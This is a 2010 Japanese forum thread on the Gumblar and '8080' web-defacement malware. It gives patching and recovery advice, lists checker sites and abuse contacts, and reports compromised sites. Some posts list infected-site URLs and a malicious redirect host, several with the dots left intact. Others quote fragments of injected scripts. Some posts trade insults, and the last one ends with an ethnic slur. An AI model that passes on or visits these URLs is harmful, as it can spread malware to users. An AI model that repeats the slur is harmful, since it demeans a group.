【Gumblar/GENO】Web改竄ウイルス総合スレ8【8080】
レス数が1000を超えています。これ以上書き込みはできません。
0001名無しさん@お腹いっぱい。
2010/04/21(水) 03:14:22感染しているサイト・ウイルス情報・対策方法・脆弱性情報などをお願いします
一部のウイルス被害が増加して混乱するようなら別スレを立てて誘導してください
基本的な対策としてセキュリティ・アップデートを欠かさないようにしましょう
*** 危険と思われるサイトのアドレスはそのまま貼らないで全ての「.」を「●」に変えてください ***
*** 感染した場合はクリーンインストールと安全なPCからのFTPパスワードの変更を推奨します ***
【前スレ】
【Gumblar/GENO】Web改竄ウイルス総合スレ7【8080】
http://pc11.2ch.net/test/read.cgi/sec/1268059684/
0002名無しさん@お腹いっぱい。
2010/04/21(水) 03:15:14行っておくべき事項を箇条書きにしました。
細かなことは他にもいろいろありますが、とりあえず以下を実施して下さい。
(1)Microsoft Update(Windows Update)を実行しシステムを最新の状態にする
(2)Adobe Readerを最新版に更新する
(3) Adobe ReaderのAcrobat JavaScriptを無効に設定
(4) JRE(Java Runtime Environment)を最新版に更新する
(5) Flash Playerを最新版に更新する
(6) QuickTimeを最新版に更新する
(1)〜(4)を行っていれば、現時点で改ざんサイトを閲覧してもウイルスには感染しない。
攻撃コードは変化する可能性もあるので、念のため全て行っていただきたい。
Adobe Readerなどのアップデート方法については下記のトピックスを参照のこと。
Acrobat JavaScriptを無効にする方法は以下の通り。
(1)Adobe Readerを起動し[編集]メニューの[環境設定]を選択
(2)「分類」の中の「JavaScript」を選択
(3)「Acrobat JavaScriptを使用」のチェックをクリア
(4)「OK」ボタンを押す
※サイトを運営されている方は、さらに次のことも実施していただきたい。
(1)管理サイトのページのソースに意味不明な文字列が埋め込まれていないか確認する
(2)改ざんされていたり、サイト管理に使うパソコンからウイルスが見つかった場合には、
ウイルスに感染していないパソコンを使用して管理サイトのパスワードを変更する
0003名無しさん@お腹いっぱい。
2010/04/21(水) 03:17:03下記については必ずアップデートしてください
使用していないものはアンインストール推奨です
■ Windows XPは可能ならば新しいOSに
■ Windows Update / Microsoft Updateを更新
・XP以下は念のためMicrosoft Updateに変更してアップデートする
■ Adobe Reader(Acrobat,Acrobat Reader)を更新 (使っていないならアンインストール)
ttp://get.adobe.com/jp/reader/
・インストール後本体をアップデート
ヘルプ → アップデートの有無をチェック
・Acrobat Javascriptをオフにする
編集 → 環境設定 → Javascript → 「Acrobat Javascriptを使用」のチェックを外す
■ Adobe Flash Playerを更新 (動画サイト見てるなら絶対入ってる。IE版、Firefox等の非IE版に注意!)
ttp://get.adobe.com/jp/flashplayer/
ttp://www.adobe.com/jp/shockwave/download/alternates/#fp
・Flash Playerのバージョン確認
ttp://www.adobe.com/jp/software/flash/about/
ttp://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm
■ Adobe Shockwave Playerを更新 (最近は使わないはずなのでアンインストール)
ttp://www.adobe.com/jp/shockwave/download/alternates/#sp
■ Java Runtime Environmentを更新 (Javascriptとは違うので注意)
ttp://www.java.com/ja/
・Javaのバージョン確認
ttp://www.java.com/ja/download/installed.jsp
■ QuickTimeを更新 (メールアドレスの入力は不要。使っていないならアンインストール)
ttp://www.apple.com/jp/quicktime/download/
■ RealPlayerを更新 (使っていないならアンインストール)
ttp://jp.real.com/?mode=basic
0004名無しさん@お腹いっぱい。
2010/04/21(水) 03:18:26※javascriptをオフにすると、その機能を利用した一部のサイトが見られなくなる可能性があります
●InternetExplorer ツール→インターネットオプション→セキュリティ→
レベルのカスタマイズ→スクリプトのとこ全部無効にチェック
※ActiveXもOFF
●Opera ツール→クイック設定→「javascriptを有効にする」のチェックを外す
●safari 編集→設定→「JavaScriptを有効にする」のチェックを外す
●Sleipnir ツール→Sleipnirのオプション→ビュー(Trident)→
デフォルトセキュリティ欄の「JavaScriptの実行を許可する」のチェックを外す
●Lunascape ツール→設定→セキュリティ→スクリプトの実行を許可のチェック外す
※SP3でIE8を使うと重くなる場合、Sleipnir&IE8Sleipnirエディション
もしくはLunascape5を使うといいようです。
●Firefox ツール→オプション→コンテンツでJavaScript有効にするをはずす
0005名無しさん@お腹いっぱい。
2010/04/21(水) 03:19:19【改ざんサイトの調査など】
■ チェッカーサイト
・gredでチェック
ttp://www.gred.jp/
・aguse
ttp://www.aguse.net/
・WebGetter
ttp://rd.or.tp/get.php
・Dan's View Source
ttp://www.dan.co.uk/viewsource/
・飛び先のチェック by ぴょん基地の友達
ttp://www.kakiko.com/check/sample.html
0006名無しさん@お腹いっぱい。
2010/04/21(水) 03:22:20設定例:JaneView
設定>基本>機能>コマンド欄で
コマンド名 任意の名前
実行するコマンドに 任意のURL
を記載して追加。終わったら「よろし」をクリック。
これで設定完了。
http://www.geocities.jp/nanasi_san_exe/online_help/option/function/command.html
これで専ブラから検索でチェックできるようになります。
以下がそのコマンドの一例になります。
aguse.net サイト情報検索=http://www.aguse.net/result1.php?url=$LINK
飛び先のチェック=http://www.kakiko.com/check/?$LINK
WebGetterでソースを見る=http://rd.or.tp/get.php?site=$LINK&act=view
WebGetterでタグを除去してソースを見る=http://rd.or.tp/get.php?site=$LINK&act=strip
WebGetterでリンクを抽出する=http://rd.or.tp/get.php?site=$LINK&act=link
Dan's View Sourcelでソースを見る=http://www.dan.co.uk/viewsource/index.php?url=$LINK
Dr.WEB=http://online.drweb.com/result?url=$TEXT$LINK
0007名無しさん@お腹いっぱい。
2010/04/21(水) 03:49:11■インシデント報告の届出(JPCERT/CC)
https://www.jpcert.or.jp/form/
サイト管理者の連絡先不明の場合はWHOISからサーバー管理者へ通報してください。
以下、代表的なサーバー管理会社
デジロック https://www.value-domain.com/webabuse.php
OCN http://www.ocn.ne.jp/info/rules/abuse/
さくら https://secure.sakura.ad.jp/notify/form/abuse.phtml
ロリポップ https://lolipop.jp/support/inq/
GMOインターネットグループ https://secure.gmo.jp/contact/
インフォシーク (isweb) http://portal.faq.rakuten.co.jp/
DION http://www.auone-net.jp/security/knowledge/navi/index.html
NTTPCコミュニケーションズ http://www.nttpc.ne.jp/
ODN https://www.odn.ne.jp/support/question/input_netabuse.html
xserver (株式会社ベット) http://www.xserver.ne.jp/faq.php
heteml ヘテムル https://secure.heteml.jp/support/inquiry/
ファーストサーバ http://www.firstserver.co.jp/contact/index.html
エキサイト http://www.excite.co.jp/help/support
0008名無しさん@お腹いっぱい。
2010/04/21(水) 04:06:35ウイルス・不正アクセス届出状況について(3月分および第1四半期)
http://www.ipa.go.jp/security/txt/2010/04outline.html
(3)ウェブサイト改ざんの被害発生時の対処
ウェブサイトが改ざんされてしまった場合、ウェブサイト管理者は被害者であると同時に、ウェブサイト利用者に対する加害者となってしまう可能性があります。
被害の拡大を防ぐために、次に示すような対応が求められます。
▼まず初めに行うべきこと
まず初めに行うことは、早急にウェブサイトの公開を停止することです。同時に ftp のパスワードの変更も行ってください。
このとき、これまでウェブサイトの管理に利用していたパソコンには、ftp のパスワードを盗聴するウイルスが感染している可能性があるため、別のパソコンから操作することを勧めます。
同時に、別のウェブサイトを立てるなどして、ウェブサイト利用者に対して調査状況の説明や、問い合わせ用窓口を設けるなど、随時情報提供に努めてください。
▼改ざん箇所の洗い出し等の調査
上記の対応を行ったのち、保管しておいたクリーンなファイルとウェブサーバ上のファイルの比較などの方法で、全ての改ざん箇所の洗い出しを行ってください。
また、同じパソコンで管理しているウェブサイトが複数ある場合、他のウェブサイトにも改ざんが及んでいる可能性があるため、必ず全てのウェブサイトのファイルを確認してください。
また、改ざん期間等を把握するため、改ざん箇所ごとに ftp のアクセスログの確認などを行なって、被害状況等の調査を行ってください。
▼ウェブサイトを再公開する場合
上記の対応で全ての改ざん箇所の修正を行った上で、ウェブサイトの公開を再開する場合、必ずウェブサイト利用者への改ざんの事実の告知も掲載してください。
ウェブサイト再開の際には、判明した範囲で、次に示す情報を告知することを勧めます。
改ざんの事実の説明
・ 改ざんされていた箇所
・ 改ざんされていた期間
・ ウェブサイト利用者が改ざんされていた箇所を閲覧した場合に想定される被害(ウイルス感染など)の説明
・ ウイルスのチェック方法の説明(必要に応じてオンラインスキャンサイトの紹介など)
・ 問い合わせ用窓口の連絡先
IPAに不正アクセスの届出
http://www.ipa.go.jp/security/ciadr/index.html
0009名無しさん@お腹いっぱい。
2010/04/21(水) 04:10:59LAC セキュリティアラート
【注意喚起】Gumblar(ガンブラー)ウイルスによる新たなホームページ改ざん被害を確認
http://www.lac.co.jp/info/alert/alert20100303.html
> 株式会社ラックでは、Apacheの設定ファイルである「.htaccess」の不正アップロードを行うGumblarウイルスの活動を複数サイトにおいて確認しました。
ニュース・リリース|アンチウイルス・アンチウイルスソフトの【 カスペルスキー 】
Gumblar 亜種に続く、Pegel 対策に関する留意点
http://www.kaspersky.co.jp/news?id=207578803
> 感染が確認された場合は、対策として OS の再インストールをお勧めします。
セキュリティ通信
サイト改ざん猛威:感染パソコンの修復は「OSの再インストール」が近道
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2166
サイト改ざん(1)「告知せず」で感染拡大の恐れ〜負の連鎖を断ち切るために
http://www.so-net.ne.jp/security/news/library/2112.html
「ガンブラー」「サイト改ざん」めぐる基本のQ&A 〜 何が起きている? 対策は?
http://www.so-net.ne.jp/security/news/newstopics_201001.html
0010名無しさん@お腹いっぱい。
2010/04/21(水) 10:03:02┌─┌─┌─┌─┌─┌─┌─┌─┌─┌─┌─┌─┌─┌─┌─┌─┌─
┌─┌─小野寺です。〓MS Japan Security Team〓┌─┌─┌─┌─┌─┌─
ttp://internet.watch.impress.co.jp/img/iw/docs/324/669/mse1.jpg
国/地域ごとのマルウェア感染率。(Microsoft Security Intelligence Reportより)
日本は最も感染率が低い(緑色)が、依然として感染率が高い地域(赤色)も多い。
ttp://internet.watch.impress.co.jp/img/iw/docs/324/669/mse2.jpg
┌─┌─┌─┌─┌─┌─┌─┌─┌─┌─┌─┌─┌─┌─┌─┌─┌─
下記の図は、2009 年上半期における、8 地域での異なる種類のマルウェアと迷惑
ソフトウェアである可能のあるものの相対的な蔓延を表しています。
(それぞれの期間中に 2 種類以上の脅威が削除されるコンピューターも存在するため、
それぞれの地域における感染率の合計が 100 パーセントを超える場合があります。)
この図で使用されている項目の説明は、マイクロソフト セキュリティ インテリジェンス
レポート 第 7 版40 ページをご覧ください。
いとかしこ
ttp://img.microsoft.com/japan/security/images/contents/SirV7MalType.png
┌─┌─┌─┌─┌─┌─┌─┌─┌─┌─┌─┌─┌─┌─┌─┌─┌─
┌─┌─┌─┌─┌─┌─┌─┌─┌─┌─┌─┌─┌─┌─┌─┌─┌─
0011名無しさん@お腹いっぱい。
2010/04/21(水) 16:48:28Gumblarの方も元気ですね。
www●putto24●com
0012名無しさん@お腹いっぱい。
2010/04/21(水) 20:28:320013名無しさん@お腹いっぱい。
2010/04/21(水) 20:58:180014名無しさん@お腹いっぱい。
2010/04/22(木) 00:53:070015名無しさん@お腹いっぱい。
2010/04/22(木) 05:18:040016名無しさん@お腹いっぱい。
2010/04/22(木) 08:28:17↑のサイトavastがトロイの木馬発見してブロックしたけど、表示しただけで感染するの?
0017名無しさん@お腹いっぱい。
2010/04/22(木) 10:32:26>>1嫁
スクリプトではなくトロイってことはすでに何かDLしてるんじゃね
他の何かに感染してる可能性も否めない
0018名無しさん@お腹いっぱい。
2010/04/22(木) 10:45:39http://www.virustotal.com/jp/analisis/f7e58080cb1ab8edf742a3e98e87a90292d7ea85f4263a013c3e02b9f9997b7d-1271900484
0019コテハン ◆8080adndqg
2010/04/22(木) 13:28:22ソースの最後に
<script>function eIGJJlOJ(・・・・・
8080とはちょっと違うタイプのやつ
0020名無しさん@お腹いっぱい。
2010/04/22(木) 14:36:01tapiroten■info/lin.cgi?jzo
繋がらない
0021名無しさん@お腹いっぱい。
2010/04/22(木) 18:14:16Gumblar.Xの亜種とかだな多分
多分だけど
0022名無しさん@お腹いっぱい。
2010/04/22(木) 18:17:190023コテハン ◆8080adndqg
2010/04/22(木) 19:42:12ttp://8.pro.tok2.com/~miyuki-net-school/index.html
>【最低最悪のsecurity toolに関して】は削除しました。
>連日,相当 多数の皆さんが このページの駆除方法で security toolを駆除され,
>再び 元通りにパソコンを使用出来たにも関わらず
>ほとんどの皆さんから 何の喜びのメッセージをいただけませんでした。
>よって このページは削除しました。
>security toolの駆除方法を知りたい人は メールをください。
このジジイの上から目線は何とかならんのか?
0024名無しさん@お腹いっぱい。
2010/04/22(木) 19:49:130025名無しさん@お腹いっぱい。
2010/04/22(木) 19:49:17やれやれ…
http://okwave.jp/qa/q5439358.html
で自サイトの宣伝までしてらぁw
ググりゃ削除方法ぐらいいくらでも出て来るのに、メール出すやつがいるのかねぇ?
0026名無しさん@お腹いっぱい。
2010/04/22(木) 19:58:13放っておけばいいのに
0027名無しさん@お腹いっぱい。
2010/04/22(木) 20:01:46ググって10番目以内にいるならそのページを見て駆除したってやつもいるかもしれんが…
さすがに自意識過剰すぎてキモいな
0028名無しさん@お腹いっぱい。
2010/04/22(木) 20:12:33おまえらのがキモいよ
つうか気違いだろお前
0029名無しさん@お腹いっぱい。
2010/04/22(木) 20:15:480030名無しさん@お腹いっぱい。
2010/04/22(木) 20:16:480031名無しさん@お腹いっぱい。
2010/04/22(木) 22:19:440032名無しさん@お腹いっぱい。
2010/04/23(金) 00:22:52ここにある8080って大丈夫ですか?
Adblock Plusで8080ブロックしてるフィルタに引っかかったのですが
aguseだとウイルスじゃないようです
外部と接続するオブジェクトが青く表示されているので気になります
0034名無しさん@お腹いっぱい。
2010/04/23(金) 03:36:26www●idem-home●co●jp
既出だったらごめんよ
she3ah●110mb●com
<script>tmp="22111122211122112111212221…
1と2がだらだらと…こんなスクリプトあったのね
0035名無しさん@お腹いっぱい。
2010/04/23(金) 08:01:03thx
フィルタに初めて引っかかったので
心配だったが安心したよ
0036名無しさん@お腹いっぱい。
2010/04/23(金) 08:13:59(・3・) エェー お前ら またガンプラーが流行ってるYO
http://www.asahi.com/shopping/news/TKY201004180319.html
72 :ぼるじょあ ◆yBEncckFOU :2010/04/19(月) 15:42:03
>>71
(・3・) 〜♪
Mac OS Xに脆弱性、Appleがセキュリティアップデート公開
http://itpro.nikkeibp.co.jp/article/NEWS/20100419/347238/
0037コテハン ◆8080adndqg
2010/04/23(金) 13:12:04【陥落サイトのURL悪用厳禁】
74●125●153●132/search?q=cache:-syKPJt7YlAJ:www●mimi-navi●net/
↓
theultimateweb●info:
以前の.substr多発型に似てるからスルーしそうになったorz
0038名無しさん@お腹いっぱい。
2010/04/23(金) 13:29:520039コテハン ◆8080adndqg
2010/04/23(金) 13:30:23%68%74%74%70%3a%2f%2f%66 ←このタイプも微妙に変化してるし・・・
【陥落サイトのURL悪用厳禁】
win●amyou●net ←絶賛放置中
0040名無しさん@お腹いっぱい。
2010/04/23(金) 15:24:32giddeon●com
>>39
質問、このスクリプトは既出?
"false;var" "function" "new Date();" "String.prototype"
・http://www.virustotal.com/jp/analisis/836027ac2630610f66a8560dd4c6e432c1d5c79be2ed8d82c970a116b393a700-1272002839
・http://www.virustotal.com/jp/analisis/8b780235f6741c32d37c2a2b15bbdd0665cd06ddb533c8c959e4a20013684acb-1272002118
> "unescape;var"のヒット数が激減
['unescape'];varはあちこちで見掛けるけどね
0041名無しさん@お腹いっぱい。
2010/04/23(金) 16:31:58これってGumblarなのかな?
ttp://para-site.net/up/data/26635.jpg
ttp://para-site.net/up/data/26636.jpg
セキュリティ対策として使ってるのはAvira Security SuiteとMalwarebytes'とSUPERAntiSpywareで
何度かスキャンを掛けると様々なトロイが検出され、知らずに感染してる症状が一向に改善されない
手持ちのセキュソフトじゃダメかと思いF-SecureとSymantecでオンラインスキャンも試してみました
(F-Secureでトロイが2つ、Symantecは検出0)
けど、ついさっきも上記の怪しいサイトに勝手に移動された
それとWindows Updateでエラーが出て更新出来ないんだけど、これもGumblarのせいなのだろうか?[エラー番号: 0x80072EFE]
0x80072EFEでググってWindowsFWだけ有効にとか色々試してるんだけど、エラー0x80072EFEのままUpdate出来ない状態です
誰か有効な方法を教えて下さい、OSはXP SP3でIEはIE7、デフォルトブラウザはFirefox3.6.2です
0042名無しさん@お腹いっぱい。
2010/04/23(金) 16:36:16あと、スレチかと。
0043名無しさん@お腹いっぱい。
2010/04/23(金) 17:31:10なんでもかんでもGumblarのせいにしないでくれ
お前のはもっといろんなもんに感染してる
そのPC1年以上調子悪いだろ
スレ違いだが説明しないとケーブル抜いてくれない気がする
ブラウザが半端に古いのも気になる
OSの更新やセキュリティ対策ソフトの動きを抑止するのはウイルスの常套手段
しかしそれ以前にそのPCはいろいろ感染しすぎてどうしようもない状態
システムファイルも書き換えられているだろうしその状態から元に戻すのは困難というかおそらく無理
諦めてOS入れなおせ
ただ、今ネットに接続していること自体が迷惑なのでケーブルを抜いてくださいおねがいします
OSを入れなおす時も新しいセキュリティ対策ソフトをインストールするまではケーブルは抜いたまま
OSの更新は自動にしとけ
無料のセキュリティ対策ソフトは自分でなんとかできる人用であって
そうじゃない人はきちんと購入した方が良い
DownadupってことはUSBメモリも感染してる可能性が高い
そのPCで使用したUSBメモリを他のPCにも使用しているならそっちもやられてるかもしれん
0044名無しさん@お腹いっぱい。
2010/04/23(金) 19:37:28Avira
TR/Dldr.Shadraem.A.27
7.10.06.194で対応
0045名無しさん@お腹いっぱい。
2010/04/23(金) 20:26:44もうリカバリした方いいよそれ
0046名無しさん@お腹いっぱい。
2010/04/23(金) 23:45:58www●idem-home●co●jp
電凸完了
>>39
win●amyou●net
電凸完了
0047オルティス・ジャパン
2010/04/23(金) 23:49:420048名無しさん@お腹いっぱい。
2010/04/24(土) 05:31:130049名無しさん@お腹いっぱい。
2010/04/24(土) 15:43:39http://support.kaspersky.co.jp/viruses/solutions?qid=208283462
0050名無しさん@お腹いっぱい。
2010/04/24(土) 22:53:19電凸完了
0051コテハン ◆8080adndqg
2010/04/24(土) 23:00:128080発掘中に遭遇したことはあるけど、海外のやつは絶賛スルー中なのです。
【陥落サイトのURL悪用厳禁】
www●asianmotors●co●jp/ ←アクセス注意!
いつのまにかコードが整理されてて・・・
一番下の<script>function c12174138951n4bc351d711cc6〜〜
もう勘弁して...
0052名無しさん@お腹いっぱい。
2010/04/25(日) 00:42:06こちらの環境では1371行まででその記述が見当たらないぽ。
0053名無しさん@お腹いっぱい。
2010/04/25(日) 01:22:58>>50
乙です
>>51
レスありがと、こちらも不躾ですまない
asianmotorsのスクリプトは消えてるみたいね、上書きしたかな?
> function pde63eee4〜
> function jIxnUrxy(){if〜
そういえば最近やたらとこのタイプに引っ掛かる
【陥落サイトのURL悪用厳禁】
winbet●tonosama●jp :JS.Shadraem VT 02/41
nihon-support●jp :スクリプトが中途半端だけど念の為
0054名無しさん@お腹いっぱい。
2010/04/25(日) 02:07:03上、醤油が化けちゃってわかんね。。。orz.....
下、Last-Modified: Wed, 21 Apr 2010 01:01:15 GMT : /index.html
0055名無しさん@お腹いっぱい。
2010/04/25(日) 02:41:44http://winbet.tonosama.jp
http://giddeon.com
http://www.shinsei-fukushi.net/
http://www.nittoka.com/
http://www.1a.ad-jeaayf.com/ae/
http://www.tu-han4.com/hatumo/
http://www.daini-survey.com/
http://www.borneomarathon.com/jpn/home.html
http://www.niaufuku.com/index.htm
http://kumarin.biz/
http://www.amakusaturigu.com/html/
http://www.hdta.jp/
http://giddeon.com/
http://amyou.net/
http://yamisyoku.info/
0056名無しさん@お腹いっぱい。
2010/04/25(日) 03:58:27http://tsushima.2ch.net/test/read.cgi/news/1272134432/
0057コテハン ◆8080adndqg
2010/04/25(日) 04:09:00誤:www●asianmotors●co●jp/
正:www●asianmotors●co●in/ ←アクセス注意
0058名無しさん@お腹いっぱい。
2010/04/25(日) 04:30:44*CODE1*
Last-Modified: Tue, 27 Oct 2009 07:47:47 GMT : Scripts/AC_RunActiveContent.js
>>51のコードは「'+x1d+'」を抜いてHEXデコードしてURLデコード
0059名無しさん@お腹いっぱい。
2010/04/25(日) 14:47:08・メールのhtmlプレビュー画面でGumblar(.x)、8080系に感染する恐れってありますか?またそういった感染報告はありますか?
・ファイアーウォールでポート8080を閉じることにより感染予防の効果はありますか?
0060名無しさん@お腹いっぱい。
2010/04/25(日) 15:15:05> メールのhtmlプレビュー画面でGumblar(.x)、8080系に感染する恐れってありますか?
可能性はある。
これに限らずテキスト表示推奨。
> またそういった感染報告はありますか?
マカフィーサイトアドバイザでのgumblar.cnは一時期こんなのが出ていた。
> Our analysis found that this site may be promoted through spammy e-mail.
> ファイアーウォールでポート8080を閉じることにより感染予防の効果はありますか?
「8080系ウイルス」だけ、
Gumblar(.x)には通用しない。
0061名無しさん@お腹いっぱい。
2010/04/25(日) 15:19:17「8080系ウイルス」以外には通用しない。
0062名無しさん@お腹いっぱい。
2010/04/25(日) 15:29:07オードリーの公式サイトとか
0063名無しさん@お腹いっぱい。
2010/04/25(日) 15:30:57ありがとうございます。
ポート8080閉じることで8080系ウイルスの対策になるんですね。
0064名無しさん@お腹いっぱい。
2010/04/25(日) 15:32:51>>2
>>62
にゃんと…
0065名無しさん@お腹いっぱい。
2010/04/25(日) 15:33:24ほんとだ確認しました・・・
0066名無しさん@お腹いっぱい。
2010/04/25(日) 15:35:01確認すた。
0067名無しさん@お腹いっぱい。
2010/04/25(日) 15:40:11冗談だと思ったけれど・・・マジだった・・・
0068名無しさん@お腹いっぱい。
2010/04/25(日) 16:15:41そんなことよりしっかり>>2を行いましょう
0069名無しさん@お腹いっぱい。
2010/04/25(日) 16:18:56ウィルスと判断できるコードはソース最後のfunctionから始まるのでいいの?
ちょっとスレたてたいもので確認できる材料が欲しい。
0070名無しさん@お腹いっぱい。
2010/04/25(日) 16:21:29それでいいけどそういうことは余計な混乱の元になるから半端に載せない方がいいよ
0071名無しさん@お腹いっぱい。
2010/04/25(日) 16:21:53了解です
ありがとう
0072名無しさん@お腹いっぱい。
2010/04/25(日) 16:28:17まあいいや
VirusTotal ただしこの結果だけでavastに乗り換えるというのは早計
http://www.virustotal.com/jp/analisis/d88871a1ad9e0f1df388ea0aa041fff6a4e4df09f265ef7ae624ce642b49fa9d-1272179947
0073名無しさん@お腹いっぱい。
2010/04/25(日) 16:34:31スクリプトはDrWebは最近は一番だな
0074名無しさん@お腹いっぱい。
2010/04/25(日) 16:57:34マウスポインタ合わせてただけでavastさんが怒った
どうなってんだ
0075名無しさん@お腹いっぱい。
2010/04/25(日) 17:10:42>>2は3以外しています
007662
2010/04/25(日) 17:12:45オードリーのは公式サイトと言うよりは公式のプロフィールページのことですな。
ちなみに各タレントの公式サイト(別ドメインでのサイト)は大丈夫っぽい。
まだまだ猛威ふるってますねぇ。
というか、いい加減にHP製作会社はウイルス対策しろ。
0077名無しさん@お腹いっぱい。
2010/04/25(日) 17:17:22俺はグーグルでケイダッシュを検索しただけでavastが怒りだしたわ
0078名無しさん@お腹いっぱい。
2010/04/25(日) 17:27:300079名無しさん@お腹いっぱい。
2010/04/25(日) 17:42:34ない
0080名無しさん@お腹いっぱい。
2010/04/25(日) 17:49:27本当に最新かもう一度確認をしたほうがいい
0081名無しさん@お腹いっぱい。
2010/04/25(日) 17:53:19俺もだ
接続を遮断したけど大丈夫なのかな?
0082名無しさん@お腹いっぱい。
2010/04/25(日) 18:02:52MyJVN バージョンチェッカでは最新でした
008362
2010/04/25(日) 18:05:01気を付けましょう。
0084名無しさん@お腹いっぱい。
2010/04/25(日) 18:48:21だれか報告しよけよ
0085名無しさん@お腹いっぱい。
2010/04/25(日) 18:49:23けど、MS safe browsingはスルー
0086名無しさん@お腹いっぱい。
2010/04/25(日) 19:04:190087名無しさん@お腹いっぱい。
2010/04/25(日) 19:05:10Last-Modified: Sun, 25 Apr 2010 09:18:06 GMT : /alert.html
> ただいまメンテナンス中です。
> ご迷惑をおかけしますが、もうしばらくお待ちください。
0088名無しさん@お腹いっぱい。
2010/04/25(日) 19:06:19一時期、スターダスト?系のHPがやられていたり
なんとかはいりって人のHPがやられてたって聞いたけど
改善はされてるのか?こわくて近づけない。
0089名無しさん@お腹いっぱい。
2010/04/25(日) 19:17:55後醍醐●netもやられてたお。
0090名無しさん@お腹いっぱい。
2010/04/25(日) 19:19:03今は直ってるお。
0091名無しさん@お腹いっぱい。
2010/04/25(日) 20:01:47亀レスですまないが
Gumblar/8080 Checker
ttp://ec2-204-236-148-61.us-west-1.compute.amazonaws.com/
ここもいれておくべきなのでは
0093名無しさん@お腹いっぱい。
2010/04/25(日) 20:07:25それってJaneのコマンドに追加するときはどうやって書いたらいいの?
0094名無しさん@お腹いっぱい。
2010/04/25(日) 20:27:27サンクス
ちなみにスレチだがavastが切断を遮断したってことは感染してないよな?
0095名無しさん@お腹いっぱい。
2010/04/25(日) 20:29:26切断を遮断したら接続しちゃうんじゃね?
0096名無しさん@お腹いっぱい。
2010/04/25(日) 20:34:22ありがと
そんな機能あったんか
0097名無しさん@お腹いっぱい。
2010/04/25(日) 20:40:41すまん接続を遮断だった
バカか俺はw
0098名無しさん@お腹いっぱい。
2010/04/25(日) 21:00:250099名無しさん@お腹いっぱい。
2010/04/25(日) 21:02:38もしかしてかんせんしてる?
0100名無しさん@お腹いっぱい。
2010/04/25(日) 21:03:000101名無しさん@お腹いっぱい。
2010/04/25(日) 21:07:47馬鹿じゃねえの
0102名無しさん@お腹いっぱい。
2010/04/25(日) 21:09:22使用してるセキュリティソフトとか
0103名無しさん@お腹いっぱい。
2010/04/25(日) 21:14:080104名無しさん@お腹いっぱい。
2010/04/25(日) 21:23:11news●genki-book●jp/
avast反応した
0105名無しさん@お腹いっぱい。
2010/04/25(日) 21:31:24aguseやgredで
google-analytics.com/urchin.js
floridaorigin.at:8080/google-ch/google.com/passport.net.php
出てきた
0106名無しさん@お腹いっぱい。
2010/04/25(日) 21:52:20VirusTotal
http://www.virustotal.com/jp/analisis/fe394c05411dae90e465339c9b1ff583d14f1701c564ceed167520e95b390625-1272199074
0107名無しさん@お腹いっぱい。
2010/04/26(月) 01:00:01http://tsushima.2ch.net/test/read.cgi/news/1272180292/
avira対応してる?
0108名無しさん@お腹いっぱい。
2010/04/26(月) 01:03:170109名無しさん@お腹いっぱい。
2010/04/26(月) 01:04:520110名無しさん@お腹いっぱい。
2010/04/26(月) 01:05:470111名無しさん@お腹いっぱい。
2010/04/26(月) 01:13:32ゲハ脳みたい
0112名無しさん@お腹いっぱい。
2010/04/26(月) 01:19:54同じ気違いがずっと騒いでるだけ
0113名無しさん@お腹いっぱい。
2010/04/26(月) 01:19:57NGワードで対処出来ないスレはハナから見ない、これで解決
0114コテハン ◆8080adndqg
2010/04/26(月) 11:48:39pre21●jp/
ソースの中央付近
</SCRIPT><SCRIPT>var t;if・・・(.at:)
※定位置(最下部)には.info:のやつ
otokudou●h01●jp ←<!--<script>-->で絶賛無効化中
0115名無しさん@お腹いっぱい。
2010/04/26(月) 14:21:39パスワード変えてないのか?
0116名無しさん@お腹いっぱい。
2010/04/26(月) 16:45:58過去にも一回やらかしてるだけにもう一回やらかしたらユーザー激減しそうw
0117名無しさん@お腹いっぱい。
2010/04/26(月) 17:28:200118名無しさん@お腹いっぱい。
2010/04/26(月) 17:57:260119名無しさん@お腹いっぱい。
2010/04/26(月) 19:28:130120名無しさん@お腹いっぱい。
2010/04/26(月) 19:34:470121名無しさん@お腹いっぱい。
2010/04/26(月) 19:59:46, ' ´ /;;;;ヘ`丶
/ 〈;;;;;;;;;;;;ヘ \
/_____ \;;;;;;;;;ヘ \
〈'´ ____\_.>''´ ̄\ ',
\/...:::::::::::::___:/ , -、j 〉 /\
< ̄.::::::::;:> ' { } {、;;;;;\┬' /. \
,≦::::; ' ´ , ゝ-夂i不丁::::::\;;;;;\__ /::::.. \
>'´ ,. イ/ |:/イ乙i |::::::::::::::\;;;;〈/;;;::::::::::.. \
/ , イN|i} 辷ソノ:::::::::::::::::::iヽ/;;;;;;;;;;::::::::::.... \
\ ≦:::::::::八.ヒ!、 /.:::::::::::/:::::::| \;;;;;;;;;;;;;;;::::::::::.. \
\ `<:__;ゝ―‐<::::::::::::; イl:::::::::i \;;;;;;;;;;;;;;;::::::::::... \
. \ /:::/ ヾニニニニヽ;::::::〉 \;;;;;;;;;;;;;;;;:::::::::... \
ヽ、|::::| \  ̄`丶 \;;;;;;;;;;;;;;;;;::::::::.. \
|::::| \ \;;;;;;;;;;;;;;;;;::::::::.. \
 ̄\ \ \;;;;;;;;;;;;;;;;;;;:::::::... \_____
ヽ ____ / \ \;;;;;;;;;;;;,;;;;;;:::::::... /
,.イ ヽ i \ \;;;;,;;;;;;;;;;;;;;;:::::::... /
/:::{ ト、 .......ヽ \;;;;;;;;;;;;;,;;;;;;;::::::::/
0122名無しさん@お腹いっぱい。
2010/04/26(月) 20:29:570123名無しさん@お腹いっぱい。
2010/04/26(月) 20:59:100124名無しさん@お腹いっぱい。
2010/04/26(月) 21:01:120125名無しさん@お腹いっぱい。
2010/04/26(月) 22:38:34ところでケイダッシュ公式が再開してるようだが
http://www.aguse.jp/?m=w&url=www.kdash.jp&x=19&y=4
http://www.aguse.jp/?m=w&url=www.kdashstage.jp&x=37&y=21
0126名無しさん@お腹いっぱい。
2010/04/26(月) 22:52:02>>125
上はまだ ぁぅぁぅぁー
http://tsushima.2ch.net/test/read.cgi/news/1272180292/329
0127名無しさん@お腹いっぱい。
2010/04/26(月) 22:55:38な(んてこっ)た
aguseGWで覗いて正解だった…危ない危ない
0128名無しさん@お腹いっぱい。
2010/04/26(月) 23:03:42http://www.virustotal.com/jp/analisis/d40d160a5bdeaa667f8081a869c632a45ff8a6b5e94d8c2b67a586c570ef1559-1272289861
ケイダッシュとpre21●jp/に連日凸したが
奴等は電話を切りやがった
人としておかしい
流石三国人w
0129名無しさん@お腹いっぱい。
